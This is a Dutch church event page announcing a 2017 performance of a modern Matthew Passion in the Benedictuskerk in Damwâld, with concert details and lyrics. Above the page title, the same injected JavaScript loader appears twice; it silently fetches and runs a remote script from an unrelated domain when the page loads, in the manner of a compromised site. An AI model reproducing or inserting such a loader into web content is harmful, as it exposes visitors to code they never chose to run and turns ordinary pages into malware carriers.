;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mattheüs Passie in de Benedictuskerk te Damwâld - PKN Damwâld
10 april 2017
19:30 t/m 21:00
Mattheüs Passie in de Benedictuskerk te Damwâld

In de tijd voor Pasen wordt gewoontegetrouw Bach’s Mattheüs Passion uitgevoerd, het verhaal van Jezus’ lijden en sterven. In het spoor van deze traditie zijn tot op de dag van vandaag nieuwe Passionen gecomponeerd, die in een moderne stijl hetzelfde oude verhaal vertellen. Een van die nieuwe getoonzette lijdensverhalen is de Matteüs Passie van Piet van Midden en Gerard van Amstel. Het bijzondere van deze Passie is dat het publiek tussentijds vier oorspronkelijke koralen van Bach’s bewerking kan meezingen. Oude en nieuwe muziek wisselen elkaar verrassend af.

De passie begint met het bezingen van de mooie dromen, de dromen van vanouds: geloof, hoop en liefde, die al met Abraham zijn meegekomen. Na het verraad van Judas, de verloochening van Petrus en de kruisdood van Christus, eindigt de passie met het duet van de twee Maria’s: “Mensen gaan en mensen komen, opgeschreven in Gods hand. Leven door God ingenomen aan die verre overkant.” Het koor bevestigt dit duet met de woorden: “En ze slapen en ze dromen, totdat Hij hen wakker maakt: ‘Ik heb alles nieuw geschapen. Het is tijd om op te staan’.”

Het koor ‘Zingt Gode Lof’ uit Gerkesklooster-Stroobos gaat  dit werk met hulp van verschillende gastzangers  uitvoeren. Het geheel wordt muzikaal ondersteund door piano, dwarsfluit en cornet. De algehele leiding is in handen van Dineke Oostra.

Wij verwelkomen u graag op onze uitvoering op maandag  10  april om 19.30 uur in de Benedictuskerk, Doniawei 76, Damwâld.

De passie duurt ongeveer 60 minuten, de toegang is gratis (collecte bij de deur).

Tijd om op te staan, om erbij te zijn en om geraakt te worden!